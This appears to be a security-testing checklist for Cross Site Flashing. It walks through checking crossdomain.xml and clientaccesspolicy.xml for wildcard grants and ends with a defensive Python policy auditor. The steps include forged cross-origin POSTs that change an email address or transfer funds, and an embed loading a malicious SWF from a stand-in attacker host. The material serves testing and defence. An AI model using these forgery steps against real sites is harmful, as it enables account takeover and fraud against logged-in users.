Cross Site Flashing

Check List

Methodology

Black Box

CSRF via Flash (crossdomain.xml Misconfiguration)

1. Identify whether the application embeds a Flash object (an <object> or <embed> tag referencing a .swf, or a SWF loaded by script).

2. Browse the application and note the URL of the embedded SWF file, for example:

GET /static/upload.swf HTTP/1.1
Host: target.com

3. Request the Flash cross-domain policy file from the web root of the same host:

GET /crossdomain.xml HTTP/1.1
Host: target.com

4. Check whether the response contains a permissive policy:

<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>

5. With domain="*", a SWF served from any origin may send requests to target.com with the victim's cookies attached and, unlike a plain HTML form, read the responses. Log in to your own account and intercept a sensitive state-changing request (for example, changing the account e-mail address):

POST /account/change-email HTTP/1.1
Host: target.com
Cookie: session=abc123
Content-Type: application/x-www-form-urlencoded

email=attacker@test.com

6. Create a malicious SWF that replays this POST to the sensitive endpoint; the browser attaches the victim's cookies to the request.

7. Host the malicious SWF on an attacker-controlled domain.

8. Embed the SWF in an attacker page:

<object data="http://attacker.com/malicious.swf"></object>

9. Open the attacker page in a browser that is authenticated to target.com. If the e-mail address is changed, the cross-origin request was accepted because of the permissive crossdomain.xml and Cross Site Flashing is confirmed. Note that an endpoint with no CSRF token at all is already forgeable from a plain HTML form; what the permissive policy adds is that the SWF can first fetch the form, read the anti-CSRF token out of the authenticated response and include it in the POST, so token-protected endpoints must be tested as well.


Socket Policy Misconfiguration

1. Check for the Silverlight cross-domain policy file. clientaccesspolicy.xml is the Microsoft Silverlight counterpart of crossdomain.xml (Silverlight also falls back to crossdomain.xml); Flash Player does not read it. Flash socket policies are instead fetched from a socket policy server on TCP port 843 in reply to <policy-file-request/>, where a permissive entry looks like <allow-access-from domain="*" to-ports="*"/>.

GET /clientaccesspolicy.xml HTTP/1.1
Host: target.com

2. Check whether the response grants wildcard access. Allowed origins are listed as <domain uri="..."/> children of <allow-from>, not as a domain attribute:

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>

3. Such a policy lets a client on any origin send requests with arbitrary headers to every path on the host and read the responses. Develop a proof-of-concept client on an attacker origin (a Silverlight application, or a SWF if the host also publishes a permissive crossdomain.xml) that sends an authenticated POST to the sensitive endpoint:

POST /api/transfer HTTP/1.1
Host: target.com
Cookie: session=abc123
Content-Type: application/json

{"amount":1000,"to":"attacker"}

4. Host the proof-of-concept externally and have the victim visit the attacker page while logged in.

5. If the transaction executes without additional server-side validation (for example an anti-CSRF token or re-authentication), request forgery through the browser plug-in is possible.

6. If authenticated state-changing requests can be triggered cross-domain through the plug-in, Cross Site Flashing is confirmed.
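A small audit helper for steps 3 and 4 of the crossdomain.xml procedure and steps 1 and 2 of the clientaccesspolicy.xml procedure above. This is an added example written for this page, not code from the original checklist; the three policy documents are constructed samples, and in a real test you would pass in the body returned by the GET requests shown above. It flags the wildcard domain, the secure="false" downgrade and the to-ports="*" socket grant in crossdomain.xml, and the wildcard uri, wildcard headers and whole-site resource grant in clientaccesspolicy.xml.

```python
import xml.etree.ElementTree as ET

# Constructed sample policy bodies (not captured from any real host).
PERMISSIVE_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

STRICT_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.target.com"/>
</cross-domain-policy>
"""

PERMISSIVE_CLIENTACCESS = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
"""


def audit_crossdomain(root):
    """Findings for an Adobe crossdomain.xml (Flash Player) policy."""
    findings = []
    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": any origin may read responses')
        elif domain.startswith("*."):
            findings.append(f'allow-access-from domain="{domain}": every subdomain is trusted')
        # secure defaults to true; only an explicit false lets http origins read https content
        if el.get("secure", "true").lower() == "false":
            findings.append(f'allow-access-from domain="{domain}" secure="false": '
                            'http origins may read https content')
        # to-ports only has meaning in a socket policy (served on TCP 843)
        if el.get("to-ports") == "*":
            findings.append(f'allow-access-from domain="{domain}" to-ports="*": '
                            'raw sockets to every port')
    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*" headers="'
                            f'{el.get("headers", "")}": arbitrary headers from any origin')
    return findings


def audit_clientaccess(root):
    """Findings for a Microsoft clientaccesspolicy.xml (Silverlight) policy."""
    findings = []
    for policy in root.iter("policy"):
        for allow in policy.findall("allow-from"):
            if allow.get("http-request-headers") == "*":
                findings.append('allow-from http-request-headers="*": arbitrary headers accepted')
            for dom in allow.findall("domain"):
                if dom.get("uri") == "*":
                    findings.append('allow-from/domain uri="*": any origin may read responses')
        for res in policy.iter("resource"):
            if res.get("path") == "/" and res.get("include-subpaths", "false").lower() == "true":
                findings.append('grant-to resource path="/" include-subpaths="true": whole site exposed')
    return findings


def audit_policy(xml_text):
    """Return a list of findings for a crossdomain.xml or clientaccesspolicy.xml body."""
    root = ET.fromstring(xml_text)
    if root.tag == "cross-domain-policy":
        return audit_crossdomain(root)
    if root.tag == "access-policy":
        return audit_clientaccess(root)
    raise ValueError(f"unrecognised policy root <{root.tag}>")


if __name__ == "__main__":
    samples = [
        ("crossdomain.xml (permissive)", PERMISSIVE_CROSSDOMAIN),
        ("crossdomain.xml (strict)", STRICT_CROSSDOMAIN),
        ("clientaccesspolicy.xml (permissive)", PERMISSIVE_CLIENTACCESS),
    ]
    for name, body in samples:
        findings = audit_policy(body)
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

The strict sample produces no findings: it names one exact origin, keeps the default secure="true", and the master-only site-control stops per-directory policy files from widening it. An empty finding list is a starting point, not a clean bill of health, since a subdomain listed in the policy may itself host user-controlled content.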


White Box

Cheat Sheet
